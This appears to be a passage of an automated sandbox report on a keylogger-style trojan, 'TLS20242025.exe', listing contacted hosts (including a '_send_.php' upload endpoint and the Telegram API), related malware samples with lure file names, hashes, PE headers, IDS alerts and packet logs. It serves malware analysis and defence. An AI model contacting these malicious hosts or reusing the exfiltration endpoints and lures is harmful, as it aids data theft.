                            https://chrome.google.com/webstore?hl=enlBTLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://reallyfreegeoip.orgTLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://chrome.google.com/webstore?hl=enPTLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.org/xml/TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUtrue
                            188.114.97.3
                            reallyfreegeoip.orgEuropean Union
                            13335CLOUDFLARENETUStrue
                            193.122.130.0
                            checkip.dyndns.comUnited States
                            31898ORACLE-BMC-31898USfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1519460
                            Start date and time:2024-09-26 15:18:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 52s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:TLS20242025.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/0@3/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 79
                            • Number of non-executed functions: 28
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: TLS20242025.exe
                            TimeTypeDescription
                            09:19:06API Interceptor11383189x Sleep call for process: TLS20242025.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                  ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                    SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/Ky4pZ0WB/download
                                                ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                • www.1win-moldovia.fun/1g7m/
                                                http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                • www.tiktok758.com/img/logo.4c830710.svg
                                                TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.rtprajalojago.live/2wnz/
                                                (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                                • dddotx.shop/Mine/PWS/fre.php
                                                QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/DiF66Hbf/download
                                                http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • easyantrim.pages.dev/id.html
                                                QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/13rSMZZi/download
                                                193.122.130.0Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                reallyfreegeoip.orgpurchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 188.114.97.3
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                checkip.dyndns.compurchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.130.0
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 132.226.247.73
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 193.122.6.168
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                api.telegram.orgVbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 149.154.167.220
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUVbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 149.154.167.220
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                CLOUDFLARENETUShttps://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                • 104.21.67.246
                                                purchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                • 172.66.0.235
                                                https://www.google.to/url?url=https://bxaxlsoggszcwwbz&nzc=vvjpqcc&suvkdk=cmz&kwdec=vutety&cbb=sslsceg&pagnn=fuhmpw&dkqf=mwwhastk&ffmvozjupo=yqbyougxxo&q=amp/gm5bqhj.g%C2%ADb%C2%ADe%C2%ADym%C2%ADw%C2%ADc%C2%ADg%C2%ADv%C2%ADk%C2%ADb%C2%ADd%C2%ADevll.com%E2%80%8B/cbvogermm&clnw=xokmakg&dhxrdhh=zgwr&tievm=savxww&gfpizxn=fnvGet hashmaliciousHTMLPhisherBrowse
                                                • 104.21.235.70
                                                http://erptanacsadas.hu.pages.services/secure-business-document/?ts=1726767567620Get hashmaliciousHtmlDropperBrowse
                                                • 188.114.96.3
                                                https://forms.office.com/e/jUjy5zj0tMGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.25.14
                                                You have a held messages (dawie@ddebeer.co.za).msgGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                Payment-Remittance_pdfrexel.se959575798273.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 104.18.11.207
                                                WG Viridium-gruppe requests your signature on 'Viridium-gruppe Employees Benefit Enrollment.pdf'.msgGet hashmaliciousHTMLPhisherBrowse
                                                • 104.17.25.14
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                ORACLE-BMC-31898USpurchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.130.0
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 193.122.6.168
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.130.0
                                                Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9adpurchase order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                • 188.114.97.3
                                                VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                • 188.114.97.3
                                                https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharingGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3
                                                ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                • 149.154.167.220
                                                Payment-Remittance_pdfrexel.se959575798273.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                rDoc5633276235623657_xls.exeGet hashmaliciousStormKitty, XWormBrowse
                                                • 149.154.167.220
                                                http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                • 149.154.167.220
                                                sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                • 149.154.167.220
                                                nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.249987035908726
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:TLS20242025.exe
                                                File size:920'064 bytes
                                                MD5:bfabeaf94d00b7c6b4af9aa3463ff5a5
                                                SHA1:0d9341d70a1e7e90c62ebcef43d1fcd2cf1b3506
                                                SHA256:e03a2edda2530392f416b8d64b85a3ae890120e6c6d08317d21ac133576cb45d
                                                SHA512:7058bf27c2fb70b564d2ac56a6be82b894abf911167c5d979049cf73c7ecd512ae392f84341d837747f0ba19428ae83c546c0e3e1727c0faad72f63bf47c6cf1
                                                SSDEEP:12288:nQTfnBGYPexcjnR+iBlVDruhxBdae9yAaeNhmXGj4qSOU:4BGYWxcjRJPruhxBzUAi1zOU
                                                TLSH:C115CF4437F8096AE9FF4BB8F4B01034C6BAFC16961FF74D9585A0F909B37019A40A76
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...am............"...0.................. ... ....@.. .......................`............`................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x4e1ece
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xEA086D61 [Thu Jun 3 16:27:13 2094 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xe1e740x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x576.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xdfed40xe0000f00e6bdee5aa65d630dd07f41eea8b32False0.5330843244280133data7.257003686976549IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xe20000x5760x6006bdba2d938cec3a01da651a16db3d6cdFalse0.4088541666666667data3.994648161937343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xe40000xc0x2004de22df61ab82bd09902cd9c027a1219False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0xe20a00x2ecdata0.43716577540106955
                                                RT_MANIFEST0xe238c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-09-26T15:19:06.686781+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.130.080TCP
                                                2024-09-26T15:19:07.811792+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.130.080TCP
                                                2024-09-26T15:19:08.396649+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715188.114.97.3443TCP
                                                2024-09-26T15:19:08.921191+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649717193.122.130.080TCP
                                                2024-09-26T15:19:10.641160+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649720188.114.97.3443TCP
                                                2024-09-26T15:19:11.733633+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649724188.114.97.3443TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 15:19:05.652606010 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:05.658149004 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:05.658256054 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:05.659281969 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:05.664112091 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:06.122944117 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:06.166923046 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:06.171946049 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:06.640362978 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:06.686780930 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:06.975997925 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:06.976094007 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:06.976243019 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:06.988984108 CEST49713443192.168.2.6188.114.97.3
